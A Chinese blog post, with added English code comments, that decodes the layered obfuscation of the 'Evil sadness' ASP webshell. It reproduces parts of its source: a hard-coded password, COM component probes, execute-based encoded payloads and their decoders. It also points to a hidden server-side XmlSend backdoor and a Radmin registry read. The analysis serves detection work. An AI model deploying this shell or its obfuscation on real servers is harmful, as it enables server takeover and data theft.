
Evil sadness(邪恶悲伤)webshell大解密及后门全解析


之所以称之为“大解密”,是因为这个 shell 叠用了多层编码/混淆(最外层是 VBScript.Encode,里面又有 escape+拆分拼接、字符串反转加标记替换等好几种自定义解码器),功能也比较强大;更关键的是后门非常隐蔽,在本地抓包是抓不到的——提示:凡是由服务端代码发起的外连请求,都不会出现在操作者本机的抓包里,所以分析这类后门要盯服务端代码里的出站调用,而不能只看浏览器流量。
这个是一个朋友传给我的,让帮忙看看有没有后门。初步查看还真没看到哪里有后门,发现几个地方可疑,但仔细一看也只是失效的“死后门”,没什么用;直到最后才发现,朴素的外表下其实“别有洞天”。
先上图

端庄的“蒙娜丽莎”,让人顿生怜悯之心

功能比较强大
下面开始解密。这个 shell 和常见的一样,最外层经过了 VBScript.Encode(微软 Script Encoder)处理,先用对应的解码器把这一层去掉。提醒:整个解密过程都应在隔离的测试虚拟机里做,不要在真实服务器上运行这个 shell,也不要为了“看明文”而让它里面的 execute 真正执行——把 execute 换成输出即可。

<%@ LANGUAGE = VBScript %><% Server.ScriptTimeout=999999999 UserPass="111" '密码 mNametitle="Evil sadness" '名字 Copyright="Evil sadness" '版权 SItEuRl="HTTP://ZZZ.Hk” ‘网站地址
' NOTE(review): the line above is several statements flattened onto one line by
' the page extraction (in the real file each ' comment ends its own line), and
' the curly quotes (” ‘) throughout this listing are likewise an extraction
' artifact -- the original source uses plain " and '.
' Security-relevant settings visible here:
'   UserPass="111"            -- the only credential gate shown in this chunk,
'                                hard-coded in the file.
'   ScriptTimeout=999999999   -- effectively disables the ASP request timeout,
'                                so long-running operations are never cut off.
Font=”300pt” ‘登陆图案大小
pic=”Ÿ” ‘登陆图案代码编号,具体代码请查看 http://zzz.hk/webdings.htm
BodyColor=”pink” ‘整体页面背景颜色,具体代码请查看 http://zzz.hk/color.htm
FontColor=”#000″ ‘普通文字颜色
LinkColor=”#50616d” ‘链接颜色
BorderColor=”#d8d8d8″ ‘文件边框颜色
LinkOverBJ=”#000000″ ‘鼠标移到链接上面背景的颜色
LinkOverFont=”red” ‘鼠标移到链接上面文字的颜色
FormColorBj=”#dddddd” ‘输入框架背景颜色
FormColorBorder=”#222000″ ‘输入框架边框颜色
‘**********************************************
‘本程序只用于安全检测服务器漏洞,
‘得用于非法用途,否则后果自负!
‘By 丫丫
‘2009.09.07
‘**********************************************
' Buffer the whole response (the shell calls Response.Flush explicitly in ShowErr).
Response.Buffer =true
' From here on every runtime error is swallowed. The component-probe loop later
' in the file depends on this: it calls Server.CreateObject for each COM name and
' inspects Err afterwards instead of letting the request fail.
On Error Resume Next
' ShowErr: if Err is set, write Err.Description into the response (the HTML
' wrapper around it was stripped by the page extraction -- hence the dangling
' quotes and blank lines), then clear the error and flush the buffer.
' Note that this echoes the raw server-side error text back to the requester.
sub ShowErr()
If Err Then
RRS”

” & Err.Description & “


Err.Clear:Response.Flush
End If
end sub
' RRS: shorthand for Response.Write. Every line of output in this shell goes
' through it, which makes `RRS"` a convenient grep/static-detection string for
' this family of ASP shells.
'   str - text written verbatim to the response
Sub RRS(str)
response.write(str)
End Sub
' RePath: double every backslash so a Windows path can be embedded inside a
' JavaScript string literal (the DB connection-string templates further down
' apply it to Session("FolderPath")).
'   S - path; returns S with each \ replaced by \\
Function RePath(S)
RePath=Replace(S,”\”,”\\”)
End Function
' RRePath: inverse of RePath -- collapse doubled backslashes back to single ones.
' Applied to the submitted FolderPath before it is stored in Session("FolderPath").
'   S - escaped path; returns S with each \\ replaced by \
Function RRePath(S)
RRePath=Replace(S,”\\”,”\”)
End Function
' Per-request state.
URL=Request.ServerVariables(“URL”)
' LOCAL_ADDR is the server's own IP; it is echoed in the page title and used in
' the SQL Server / MySQL connection-string templates.
ServerIP=Request.ServerVariables(“LOCAL_ADDR”)
' Action, FolderPath and FName come straight from the request with no
' validation. They are read with the collection-less Request(...), which in ASP
' also searches Cookies -- so the operator's commands need not appear in the
' query string or form body at all (detection-relevant). FolderPath is later
' copied into Session("FolderPath") and used as a file-system path.
Action=Request(“Action”)
RootPath=Server.MapPath(“.”)
WWWRoot=Server.MapPath(“/”)
FolderPath=Request(“FolderPath”)
FName=Request(“FName”)
' BackUrl: a "返回" (back) link; its HTML was stripped by the page extraction.
BackUrl=”

返回

' AAAA: decoder for the shell's reversed-string payloads. Θ stands for a double
' quote and Ω for a CRLF; after the Θ substitution every character is prepended
' to NewStr, which reverses the whole text. Each `execute AAAA("...")` in this
' file runs whatever it returns -- for analysis, replace that execute with a
' write. The Θ/Ω markers together with "execute AAAA(" are a usable static
' signature for this shell family.
Function AAAA(objstr):objstr=Replace(objstr,”Θ”,””””):For i=1 To Len(objstr):If Mid(objstr, i, 1)<>“Ω” Then:NewStr=Mid(objstr,i,1)&NewStr:Else:NewStr=vbCrlf&NewStr:End If:Next:AAAA=NewStr:End Function
' Page header output. The HTML these three RRS calls emit (presumably the
' <html>/<title> markup) was stripped by the page extraction, leaving the
' dangling quotes and blank lines. The title written is
' mNametitle & " - " & ServerIP, i.e. the shell's name plus the server's IP.
RRS”
RRS”“&mNametitle&” – “&ServerIP&”
RRS”


dim a,b
a=” RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22%0D%0ARRS%22function%20ShowFolder%28Folder%29%7Btop.addrform.FolderPath.value%20%3D%20Folder%3Btop.addrform.submit%28%29%3B%7D%22%0D%0ARRS%22function%20FullForm%28FName%2CFAction%29%7Btop.hideform.FName.value%20%3D%20FName%3Bif%28FAction%3D%3D%22%22CopyFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u590D_%u5236%u5230%u76EE%u6807%u6587_%u4EF6%u7684_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165_%u79FB_%u52A8%u5230%u76EE%u6807%u6587%u4EF6_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22CopyFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22NewFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CreateMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u4
E0D%u80FD%u540C%u540D%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CompactMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u538B%u7F29%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u6587%u4EF6%u662F%u5426%u5B58%u5728%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%7BDName%20%3D%20%22%22Other%22%22%3B%7Dif%28DName%21%3Dnull%29%7Btop.hideform.Action.value%20%3D%20FAction%3Btop.hideform.submit%28%29%3B%7Delse%7Btop.hideform.FName.value%20%3D%20%22%22%22%22%3B%7D%7D%22″:b=replace(a,”@@@”,”Rinimama”):c=split(b,”Rinimama”):for i=0 to ubound(c):temp=temp+c(i):next:execute(unescape(temp)):RRS”function DbCheck(){if(DbForm.DbStr.value == “”””){alert(“”请你先连接数据库””);FullDbStr(0);return false;}return true;}”:RRS”function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""Select * FROM [TableName] Where ID<100"";Str[5] = ""Insert INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""Delete FROM [TableName] Where ID=100"";Str[7] = ""Update [TableName] SET USER=\'username\' Where ID=100"";Str[8] = ""Create TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""Drop TABLE [TableName]"";Str[10]= ""Alter TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""Alter TABLE [TableName] Drop COLUMN PASS"";Str[12]= ""当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""

请确认己连接数据库再输入SQL操作命令语句。
“”;}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}”
RRS”function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""请你检查数据库连接串是否正确!"");return false;}if(str.length<10){alert(""请你检查SQL语句是否正确!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}":RRS"“:rrs “
Dim ObT(13,2):ObT(0,0) = “Scripting.FileSystemObject”:ObT(0,2) = “文 件 操 作 组 件”:ObT(1,0) = “wscript.shell”:ObT(1,2) = “命 令 行 执 行 组 件”:ObT(2,0) = “ADOX.Catalog”:ObT(2,2) = “ACCESS 建 库 组 件”:ObT(3,0) = “JRO.JetEngine”:ObT(3,2) = “ACCESS 压 缩 组 件”:ObT(4,0) = “Scripting.Dictionary”:ObT(4,2) = “数据流 上 传 辅助 组件”:ObT(5,0) = “Adodb.connection”:ObT(5,2) = “数据库 连接 组件”:ObT(6,0) = “Adodb.Stream”:ObT(6,2) = “数据流 上传 组件”:ObT(7,0) = “SoftArtisans.FileUp”:ObT(7,2) = “SA-FileUp 文件 上传 组件”:ObT(8,0) = “LyfUpload.UploadFile”:ObT(8,2) = “刘云峰 文件 上传 组件”:ObT(9,0) = “Persits.Upload.1”:ObT(9,2) = “ASPUpload 文件 上传 组件”:ObT(10,0) = “JMail.SmtpMail”:ObT(10,2) = “JMail 邮件 收发 组件”:ObT(11,0) = “CDONTS.NewMail”:ObT(11,2) = “虚拟SMTP 发信 组件”:ObT(12,0) = “SmtpMail.SmtpMail.1”:ObT(12,2) = “SmtpMail 发信 组件”:ObT(13,0) = “Microsoft.XMLHTTP”:ObT(13,2) = “数据 传输 组件”:For i=0 To 13:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=” √”:Else:IsObj=” ●”:Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>“” then:Session(“FolderPath”)=RRePath(FolderPath):End If:If Session(“FolderPath”)=”” Then:FolderPath=RootPath:Session(“FolderPath”)=FolderPath:End if:execute AAAA(“noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i – )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 11 = jΩ nehT ΘBΘ = )1 ,i ,nirts(diM rO ΘbΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 21 = jΩ nehT ΘCΘ = )1 ,i ,nirts(diM rO ΘcΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 31 = jΩ nehT ΘDΘ = )1 ,i ,nirts(diM rO ΘdΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 41 = jΩ nehT ΘEΘ = )1 ,i ,nirts(diM rO ΘeΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 51 = jΩ nehT ΘFΘ= )1 ,i ,nirts(diM rO ΘfΘ = )1 ,i ,nirts(diM fIΩ )nirts(neL oT 1 = i roFΩ 0 = tluserΩ tluser ,k ,j ,i miDΩ )nirts(retniotxeh noitcnuFΩnoitcnuF dnEΩfI dnEΩΘ!daeR t'naC !rorrEΘ etirw.esnopseRΩ 
eslEΩ))))0(yarrAtroP(xeH(rtSC&)))1(yarrAtroP(xeH(rtSC(retniotxeh etirw.esnopseRΩ Θ:Θ& troP etirw.esnopseRΩ nehT )yarrAtroP(yarrAsI fIΩ) troP & htaPnimdaR(DAERGER.HSW=yarrAtroPΩΘ>rb<>rb<Θ etirw.esnopseRΩfI dnEΩΘ!daeR t'naC !rorrEΘ etirw.esnopserΩeslEΩjborts etirw.esnopserΩtxeNΩ fI dnEΩ))i(yarrAretemaraP(xeH & jbOrts = jbOrtsΩeslEΩ)))i(yarrAretemaraP(xeH(rtSC&Θ0Θ & jbOrts = jbOrtsΩ nehT 1=)))i(yarrAretemaraP(xeh( neL fIΩ)yarrAretemaraP(dnuoBU oT 0 = i roFΩnehT )yarrAretemaraP(yarrAsI fIΩΘ:Θ&retemaraP etirw.esnopseRΩ)htaPt00R( dneSlmXΩ) retemaraP & htaPnimdaR(DAERGER.HSW=yarrAretemaraPΩΘ>rb<>rbrb<Θetirw.esnopseRΩΘtroPΘ ...................................................................

按照习惯,先解密用得最多的那种编码。可以看到这一类都是同一种模式:`execute AAAA("…")`——把反转并替换过标记字符的密文交给 AAAA 还原后直接执行。顺便留意上面那段最长的密文,反过来读会看到 `hextointer`、`WSH.REGREAD(RadminPath & Port)`、`XmlSend(R00tPath)` 这样的名字:从变量名看前者是读取 Radmin 注册表项的功能,而 `XmlSend(...)` 这类由服务端发起的调用,正是排查“抓包抓不到”的后门时最该跟踪的地方。

' Excerpt (cut short) of the AAAA call pattern used throughout the file. Read
' right-to-left, with Ω as a line break, it is the tail of a `hextointer`
' function: `j = j * 16`, `Next`, `result = result + j`, `Next`,
' `hextointer = result`, `End Function`.
execute AAAA(“noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i – )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ")

解密函数为
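' AAAA: decoder for the shell's reversed-string payloads (the "十三"-style scheme).
' Encoding, seen from the plaintext side: reverse the whole text, write every
' double quote as Θ and every line break as Ω. This undoes that.
'   objstr  - encoded text (Θ = double quote, Ω = CRLF, characters reversed)
'   returns - the original text. The shell passes it straight to `execute`;
'             for analysis, write it out (Response.Write / file) instead.
' Fixed here: the listing as printed uses curly quotes (” “), which VBScript
' does not accept; this copy uses plain quotes so it can be dropped into a
' stand-alone decoder script.
Function AAAA(objstr)
    Dim i, NewStr
    objstr = Replace(objstr, "Θ", """")
    For i = 1 To Len(objstr)
        If Mid(objstr, i, 1) <> "Ω" Then
            ' prepend each character, so the text is reversed as it is rebuilt
            NewStr = Mid(objstr, i, 1) & NewStr
        Else
            NewStr = vbCrLf & NewStr
        End If
    Next
    AAAA = NewStr
End Function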
典型的“十三”式解密函数(把密文反转,再把 Θ 还原成双引号、Ω 还原成换行),这个好办。不同之处在于执行方式:它没有像“十三”那样先把解码结果赋给变量再执行,而是 `execute AAAA("…")` 直接执行,因此解密时只需把 execute 换成输出即可。
这个使用自己写的WEBSHELL Decoder & Encoder快速搞定

现在可以看到另外一处加密也是比较多的
解密函数

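' MorfiCoder: the shell's second string decoder. The payload is stored reversed,
' with every double quote written as \*\ and every line break as /*/ -- both
' markers read the same backwards, so they survive the StrReverse unchanged.
'   Code    - encoded text
'   returns - the original text, which the shell feeds to `execute`
' Fixed here: plain quotes instead of the curly quotes the listing was printed
' with, so the function actually parses.
Function MorfiCoder(Code)
    Dim txt
    txt = StrReverse(Code)
    txt = Replace(txt, "\*\", """")
    MorfiCoder = Replace(txt, "/*/", vbCrLf)
End Function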

执行方式
' Excerpt (cut short) of the MorfiCoder call pattern. Reversed, with /*/ as a
' line break, the visible part is the tail of a procedure: `end if`, `End Function`.
execute MorfiCoder(“/*/noitcnuF dnE/*/fi dne/*/\*”)
同上面的方法,解密之
解密到这里再仔细检查文件,可以发现还有 3 个地方是加密的。首先是文件开头的一处。
代码为

a=” RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22%0D%0ARRS%22function%20ShowFolder%28Folder%29%7Btop.addrform.FolderPath.value%20%3D%20Folder%3Btop.addrform.submit%28%29%3B%7D%22%0D%0ARRS%22function%20FullForm%28FName%2CFAction%29%7Btop.hideform.FName.value%20%3D%20FName%3Bif%28FAction%3D%3D%22%22CopyFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u590D_%u5236%u5230%u76EE%u6807%u6587_%u4EF6%u7684_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165_%u79FB_%u52A8%u5230%u76EE%u6807%u6587%u4EF6_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22CopyFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22NewFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CreateMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u4
E0D%u80FD%u540C%u540D%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CompactMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u538B%u7F29%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u6587%u4EF6%u662F%u5426%u5B58%u5728%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%7BDName%20%3D%20%22%22Other%22%22%3B%7Dif%28DName%21%3Dnull%29%7Btop.hideform.Action.value%20%3D%20FAction%3Btop.hideform.submit%28%29%3B%7Delse%7Btop.hideform.FName.value%20%3D%20%22%22%22%22%3B%7D%7D%22″
' The "@@@" -> "Rinimama" replace followed by a split on "Rinimama" is a no-op
' for the copy shown (no "@@@" occurs in the visible string, so c holds a single
' element and temp ends up equal to a). Its only effect is to keep
' `execute(unescape(` from appearing as one literal token for signature scanners.
b=replace(a,”@@@”,”Rinimama”)
c=split(b,”Rinimama”)
for i=0 to ubound(c)
temp=temp+c(i)
next
' Analysis tip: swap this line for Response.Write(Server.HTMLEncode(unescape(temp)))
' to dump the decoded text instead of running it. For this payload the decoded
' text is client-side JavaScript (killErrors / yesok / ShowFolder / FullForm UI
' helpers), not server-side code.
execute(unescape(temp))

这里把 escape 编码后的字符串拆开,执行时再拼回来交给 execute。解密时把 `execute(unescape(temp))` 换成 `Response.Write(Server.HTMLEncode(unescape(temp)))`(或者写入文件),就能拿到明文而不会真正执行它。再强调一次:这一步只能在隔离的测试机上做,不要在真实服务器上运行这个 shell。
得到明码。

RRS”